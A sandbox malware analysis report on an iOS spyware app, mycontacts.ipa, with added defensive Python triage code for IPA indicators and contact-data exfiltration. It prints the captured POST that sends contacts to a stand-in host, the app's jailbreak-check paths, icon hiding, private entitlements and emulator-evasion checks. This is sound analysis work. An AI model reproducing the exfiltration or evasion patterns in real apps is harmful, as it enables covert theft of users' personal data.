Analysis Report mycontacts.ipa

Overview

General Information

Sample Name: mycontacts.ipa
Analysis ID: 129790
MD5: e0e7ea33957b0b0c30f13df4ec017937
SHA1: 430d7f9c9865dac1f56b9bb5e9ea8700d83409fa
SHA256: ceeafc96b3bbd7a20749919a86b407863f9fedc83aaafa16e8d2b16c274dea8f

Detection

Score: 76 (range 0 - 100)
Whitelisted: false

Signatures

Attempts to read the proc_native sysctl variable (probably to check if the app is being emulated)
Contains functionality to determine if device is jailbroken
Has the ability to bypass Apple's code review procedure (when using an enterprise certificate for in-house distribution)
Has the permission to install, browse, and/or archive apps (using a private API)
Has the permission to launch other apps (using a private API)
Has the permission to uninstall and/or remove apps from the archive (using a private API)
Hides its icon from the SpringBoard
Sends email addresses over the network
Potentially sends phone numbers over the network
Contains functionality to query for schemes
Contains string references indicative of jailbreak checks
Contains string references to suspicious strings
Encrypts data that contains email addresses
Encrypts data that potentially contains phone numbers
Encrypts data using the common crypto API
Has permission to query schemes that could be used for querying installed apps
IP address seen in connection with other malware
May request permission to access the camera
May request permission to access the contacts database
May request permission to access the photo library
May request permission to use the microphone
Reads the system's OS release and/or type

Signature Overview

Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169) | CCCrypt: email addresses in plaintext detected
Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169) | CCCrypt: phone number strings in plaintext detected
Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169) | CCCrypt: operation encryption

Networking:

Sends email addresses over the network
Source: global traffic | HTTPS: {"Diane Preston":{"Email":"diane.preston@example.org","Mobile":"+999852333651"},"Bill Gates":{"Email":"bill.gates@example.org","Mobile":"+999123882932"},"James Albano":{"Email":"james.albano@example.org","Mobile":"+999122898777"},"Christine Salander":{"Em
Potentially sends phone numbers over the network
Source: global traffic | HTTPS: {"Diane Preston":{"Email":"diane.preston@example.org","Mobile":"+999852333651"},"Bill Gates":{"Email":"bill.gates@example.org","Mobile":"+999123882932"},"James Albano":{"Email":"james.albano@example.org","Mobile":"+999122898777"},"Christine Salander":{"Em
Source: Joe Sandbox View | IP Address: 93.184.216.34
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | DNS traffic detected: queries for: www.example.com
Source: unknown | HTTP traffic detected:
    POST /hive.php HTTP/1.1
    Host: www.example.com
    Content-Type: application/json
    Connection: keep-alive
    Accept: */*
    User-Agent: mycontacts/1 CFNetwork/1121.2.2 Darwin/19.3.0
    Content-Length: 1158
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate, br
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Cache-Control: max-age=604800
    Content-Type: text/html; charset=UTF-8
    Date: Wed, 07 Apr 2021 08:10:40 GMT
    Expires: Wed, 14 Apr 2021 08:10:40 GMT
    Server: EOS (vny/044E)
    Content-Length: 445
    Connection: close
Source: mycontacts | String found in binary or memory: http://certs.apple.com/wwdrg3.der01
Source: embedded.mobileprovision | String found in binary or memory: http://crl.apple.com/iphone.crl0
Source: mycontacts | String found in binary or memory: http://ocsp.apple.com/ocsp03-wwdrg3030
Source: CodeResources | String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: embedded.mobileprovision | String found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: embedded.mobileprovision | String found in binary or memory: https://www.apple.com/appleca/0
Source: mycontacts | String found in binary or memory: https://www.apple.com/certificateauthority/0
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60917
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60916
Source: unknown | Network traffic detected: HTTP traffic on port 60916 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 60917 -> 443
Source: IPA file Info.plist | NSCameraUsageDescription: This app requires access to your camera in order to perform video calls.
Source: IPA file Info.plist | NSMicrophoneUsageDescription: This app requires access to your microphone in order to perform phone calls.
Source: IPA file Info.plist | LSApplicationQueriesSchemes: sinaweibo, weixin, cydia, sileo, zbra
Source: classification engine | Classification label: mal76.spyw.evad.iosIPA@0/0@2/2
Source: Initial sample, func: ___29-[ViewController viewDidLoad]_block_invoke @ 0x10000729c | Static ARM disassembly: 0x1000072ac ldr x1, #0x705c (metainfo: Objc selector ref: doSimpleJailbreakChecks)
Source: Initial sample, func: ___29-[ViewController viewDidLoad]_block_invoke @ 0x10000729c | Static ARM disassembly: 0x1000072b0 bl 0x100008e70 (metainfo: Objc message: -[x0 doSimpleJailbreakChecks])
Source: Initial sample, func: -[ViewController sendContacts] @ 0x1000082c0 | Static ARM disassembly: 0x1000087cc adr x2, #0x3e8c (metainfo: Objc cfstring ref: @"https://www.example.com/hive.php")

Persistence and Installation Behavior:

Has the permission to install, browse, and/or archive apps (using a private API)
Source: Initial sample | Embedded entitlements.plist: Entitlement com.apple.private.mobileinstall.allowedSPI contains 'Install', 'Browse', and/or 'Archive'
Has the permission to launch other apps (using a private API)
Source: Initial sample | Embedded entitlements.plist: Entitlement com.apple.springboard.launchapplications is true
Has the permission to uninstall and/or remove apps from the archive (using a private API)
Source: Initial sample | Embedded entitlements.plist: Entitlement com.apple.private.mobileinstall.allowedSPI contains 'Uninstall', and/or 'RemoveArchive'

Hooking and other Techniques for Hiding and Protection:

Hides its icon from the SpringBoard
Source: Initial sample | Info.plist: SBAppTags contains 'hidden' element

Malware Analysis System Evasion:

Attempts to read the proc_native sysctl variable (probably to check if the app is being emulated)
Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169) | Sysctl read request: sysctl.proc_native

HIPS / PFW / Operating System Protection Evasion:

Has the ability to bypass Apple's code review procedure (when using an enterprise certificate for in-house distribution)
Source: Initial sample | Embedded.mobileprovision: ProvisionsAllDevices is true
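The persistence, icon-hiding and enterprise-distribution findings above all come from static properties of the bundle: Info.plist keys (LSApplicationQueriesSchemes, SBAppTags, the NS*UsageDescription strings), the embedded provisioning profile (ProvisionsAllDevices) and the private entitlements. The Python below is an added example of reproducing those checks on an IPA; it is not part of the Joe Sandbox report or of the sample. It carves the XML plist out of the CMS-wrapped embedded.mobileprovision without verifying the signature, and it takes the entitlements either from the profile's Entitlements dictionary or from a dict the caller extracted from the Mach-O code signature (for instance with codesign). The IPA it builds is constructed in memory from the values printed in this report; the bundle identifier and team ID in it are made up.

```python
import io
import plistlib
import re
import zipfile

# Indicators taken from the report: jailbreak-store URL schemes, the SpringBoard
# tag that hides the icon, and the private entitlements flagged above.
JAILBREAK_SCHEMES = {"cydia", "sileo", "zbra"}
PRIVATE_ENTITLEMENTS = {
    "com.apple.private.mobileinstall.allowedSPI",
    "com.apple.springboard.launchapplications",
}
USAGE_KEYS = ("NSContactsUsageDescription", "NSCameraUsageDescription",
              "NSMicrophoneUsageDescription", "NSPhotoLibraryUsageDescription")
PLIST_RE = re.compile(rb"<\?xml.*?</plist>", re.DOTALL)


def read_bundle_file(ipa_bytes, filename):
    """Return the bytes of Payload/<app>.app/<filename>, or None if absent."""
    pattern = re.compile(r"Payload/[^/]+\.app/" + re.escape(filename))
    with zipfile.ZipFile(io.BytesIO(ipa_bytes)) as zf:
        for name in zf.namelist():
            if pattern.fullmatch(name):
                return zf.read(name)
    return None


def load_info_plist(ipa_bytes):
    data = read_bundle_file(ipa_bytes, "Info.plist")
    if data is None:
        raise ValueError("no Payload/*.app/Info.plist in IPA")
    return plistlib.loads(data)  # plistlib handles XML and binary plists


def load_mobileprovision(ipa_bytes):
    """embedded.mobileprovision is a CMS (PKCS#7) blob around an XML plist.
    Carving the <?xml ... </plist> span skips, and does not verify, the signature."""
    data = read_bundle_file(ipa_bytes, "embedded.mobileprovision")
    match = PLIST_RE.search(data or b"")
    return plistlib.loads(match.group(0)) if match else {}


def triage(ipa_bytes, entitlements=None):
    """Return (signature, evidence) pairs. `entitlements` may be passed in after
    extraction from the code signature; otherwise the profile's dict is used."""
    info = load_info_plist(ipa_bytes)
    prov = load_mobileprovision(ipa_bytes)
    ents = entitlements if entitlements is not None else prov.get("Entitlements", {})
    findings = []

    hit = sorted(set(info.get("LSApplicationQueriesSchemes", [])) & JAILBREAK_SCHEMES)
    if hit:
        findings.append(("jailbreak_scheme_query", ",".join(hit)))
    if "hidden" in info.get("SBAppTags", []):
        findings.append(("hidden_icon", "SBAppTags contains 'hidden'"))
    for key in USAGE_KEYS:
        if key in info:
            findings.append(("requests_permission", key))
    if prov.get("ProvisionsAllDevices"):
        findings.append(("enterprise_provisioning", "ProvisionsAllDevices is true"))
    for key in sorted(PRIVATE_ENTITLEMENTS & set(ents)):
        findings.append(("private_entitlement", f"{key}={ents[key]!r}"))
    return findings


def build_sample_ipa():
    """Constructed IPA carrying the plist values printed in this report (not the
    real sample); bundle identifier and team ID are made up."""
    info = {
        "CFBundleIdentifier": "com.example.mycontacts",
        "LSApplicationQueriesSchemes": ["sinaweibo", "weixin", "cydia", "sileo", "zbra"],
        "SBAppTags": ["hidden"],
        "NSContactsUsageDescription": "This app requires access to your contacts in order to list your contacts.",
        "NSCameraUsageDescription": "This app requires access to your camera in order to perform video calls.",
    }
    prov = {
        "ProvisionsAllDevices": True,
        "Entitlements": {
            "application-identifier": "ABCDE12345.com.example.mycontacts",
            "com.apple.private.mobileinstall.allowedSPI": ["Install", "Browse", "Archive", "Uninstall", "RemoveArchive"],
            "com.apple.springboard.launchapplications": True,
        },
    }
    # Stand-in for the CMS envelope: opaque bytes on both sides of the XML plist.
    prov_blob = b"\x30\x82\x13\x37" + b"\x00" * 16 + plistlib.dumps(prov) + b"\xff" * 16
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Payload/mycontacts.app/Info.plist", plistlib.dumps(info))
        zf.writestr("Payload/mycontacts.app/embedded.mobileprovision", prov_blob)
    return buf.getvalue()


if __name__ == "__main__":
    for sig, evidence in triage(build_sample_ipa()):
        print(f"{sig:24} {evidence}")
```

On a real IPA the entitlements worth checking live in the Mach-O code-signature blob rather than the profile alone, so pass the extracted dict as the second argument; the profile's Entitlements dictionary is only what the signer was allowed to request.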

Language, Device and Operating System Detection:

Contains functionality to determine if device is jailbroken
Source: Initial sample, func: -[ViewController doSimpleJailbreakChecks] @ 0x100007f10 | Static ARM disassembly, keywords found: selref fileExistsAtPath:, cfcstring /Applications/Cydia.app
Source: Initial sample, func: -[ViewController tableView:didSelectRowAtIndexPath:] @ 0x100007350 | Static ARM disassembly, keywords found: selref canOpenURL
Source: Initial sample, func: -[ViewController doSimpleJailbreakChecks] @ 0x100007f10 | Static ARM disassembly, keywords found: selref canOpenURL
Source: Initial sample, func: -[ViewController doSimpleJailbreakChecks] @ 0x100007f10 | Static ARM disassembly, keywords found: /var/lib/cydia, /etc/apt, /private/var/lib/apt, /private/var/Users/, /var/log/apt, /Applications/Cydia.app, /private/var/stash, /private/var/lib/apt/, /private/var/lib/cydia, /private/var/cache/apt/, /private/var/log/syslog
Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169) | Sysctl requested: kern.ostype
Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169) | Sysctl requested: kern.osrelease
Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169) | Sysctl requested: kern.osrelease

Stealing of Sensitive Information:

Sends email addresses over the network
Source: global traffic | HTTPS: {"Diane Preston":{"Email":"diane.preston@example.org","Mobile":"+999852333651"},"Bill Gates":{"Email":"bill.gates@example.org","Mobile":"+999123882932"},"James Albano":{"Email":"james.albano@example.org","Mobile":"+999122898777"},"Christine Salander":{"Em
Potentially sends phone numbers over the network
Source: global traffic | HTTPS: {"Diane Preston":{"Email":"diane.preston@example.org","Mobile":"+999852333651"},"Bill Gates":{"Email":"bill.gates@example.org","Mobile":"+999123882932"},"James Albano":{"Email":"james.albano@example.org","Mobile":"+999122898777"},"Christine Salander":{"Em
Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169) | CCCrypt: email addresses in plaintext detected
Source: /var/containers/Bundle/Application/751CF237-924A-4008-9E3F-C6A00D516E2D/mycontacts.app/mycontacts (PID: 27169) | CCCrypt: phone number strings in plaintext detected
Source: IPA file Info.plist | NSContactsUsageDescription: This app requires access to your contacts in order to list your contacts.
Source: IPA file Info.plist | NSPhotoLibraryUsageDescription: This app requires access to your photo library in order to function properly.
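The two network signatures in this section fire on the plaintext JSON in the TLS-decrypted POST to /hive.php. As an added example, not part of the report or of the sample, the Python below shows that detection logic end to end: build the client request with the header set captured above, split it into request line, headers and body, and scan the body for e-mail addresses and E.164-style phone numbers. The request it inspects is constructed to match the captured one (same path, host and User-Agent); the contact entries are made up in the shape shown above, and the benign request used for contrast is invented.

```python
import json
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
PHONE_RE = re.compile(r"\+\d{8,15}")  # E.164-style; loose on purpose, this is triage


def build_request(host, path, payload):
    """Constructed client request using the header set seen in the report."""
    body = json.dumps(payload, separators=(",", ":")).encode()
    headers = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/json",
        "Connection: keep-alive",
        "Accept: */*",
        "User-Agent: mycontacts/1 CFNetwork/1121.2.2 Darwin/19.3.0",
        f"Content-Length: {len(body)}",
    ]
    return "\r\n".join(headers).encode() + b"\r\n\r\n" + body


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers, body


def find_pii(body):
    """Distinct e-mail addresses and phone numbers found anywhere in the body."""
    text = body.decode("utf-8", "replace")
    return {
        "emails": sorted(set(EMAIL_RE.findall(text))),
        "phones": sorted(set(PHONE_RE.findall(text))),
    }


def inspect_request(raw):
    """Triage record for one request; 'exfil' is True when a POST body carries
    contact data, which is what the two signatures above key on."""
    method, path, headers, body = parse_request(raw)
    pii = find_pii(body)
    return {
        "method": method,
        "url": f"{headers.get('host', '?')}{path}",
        "user_agent": headers.get("user-agent", ""),
        "content_length": int(headers.get("content-length", "0")),
        "emails": len(pii["emails"]),
        "phones": len(pii["phones"]),
        "exfil": method == "POST" and bool(pii["emails"] or pii["phones"]),
    }


# Constructed contact list in the shape of the captured JSON (values are made up).
SAMPLE_CONTACTS = {
    "Diane Preston": {"Email": "diane.preston@example.org", "Mobile": "+999852333651"},
    "Bill Gates": {"Email": "bill.gates@example.org", "Mobile": "+999123882932"},
    "James Albano": {"Email": "james.albano@example.org", "Mobile": "+999122898777"},
}
SAMPLE_REQUEST = build_request("www.example.com", "/hive.php", SAMPLE_CONTACTS)

if __name__ == "__main__":
    print(inspect_request(SAMPLE_REQUEST))
```

The phone pattern is deliberately permissive, which is why the tool reports it as "potentially" phone numbers; in production you would join this with the app's contacts permission (NSContactsUsageDescription above) and the destination's reputation before raising severity.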

Mitre Att&ck Matrix

Techniques matched by this run, per tactic (signature count in brackets); the unmatched filler cells of the source matrix are not listed:

Defense Evasion: Application Discovery (1), Evade Analysis Environment (1)
Discovery: Application Discovery (1), System Information Discovery (13), Evade Analysis Environment (1)
Collection: Access Contact List (3), Capture Audio (1), Data from Local System (1), Capture Camera (1)
Exfiltration: Data Encrypted (3), Standard Application Layer Protocol (2)
Command and Control: Encrypted Channel (1), Standard Application Layer Protocol (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (3), Application Layer Protocol (4)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name                                 IP              Active   Malicious   Antivirus Detection   Reputation
www.example.com                      93.184.216.34   true     false       none                  high
api.apple-cloudkit.fe.apple-dns.net  17.248.145.147  true     false       none                  unknown
api.apple-cloudkit.com               unknown         unknown  false       none                  unknown

Contacted URLs

Name                              Malicious   Antivirus Detection   Reputation
https://www.example.com/hive.php  false       none                  high

Contacted IPs

Public

IP              Domain                               Country         ASN    ASN Name           Malicious
93.184.216.34   www.example.com                      European Union  15133  EDGECAST (US)      false
17.248.145.147  api.apple-cloudkit.fe.apple-dns.net  United States   714    APPLE-ENGINEERING  false

Note on the "IP address seen in connection with other malware" signature: 93.184.216.34 is simply what www.example.com resolved to during this run (ASN 15133, EDGECAST), and www.example.com is the IANA reserved documentation domain; the POST to /hive.php was answered with a 404. Treat the IP hit as shared-hosting noise rather than attacker infrastructure, and base the exfiltration finding on the captured request body.

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 129790
Start date: 07.04.2021
Start time: 10:09:52
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 2m 33s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: mycontacts.ipa
Cookbook file name: defaultiosinteractivecookbook.jbs
Analysis system description: iPhone 7, iOS 13.3.1
Analysis Mode: default
Detection: MAL
Classification: mal76.spyw.evad.iosIPA@0/0@2/2
Warnings:
• Excluded IPs from analysis (whitelisted): 2.17.122.218, 2.17.123.152, 2.17.123.154, 2.17.122.209, 2.17.122.217, 2.17.122.224, 2.17.122.219, 2.17.123.176, 2.17.123.168
• Excluded domains from analysis (whitelisted): iphone-ld.apple.com, iphone-ld.origin-apple.com.akadns.net, a1931.dscgi3.akamai.net, iphone-ld.apple.com-v1.edgesuite.net
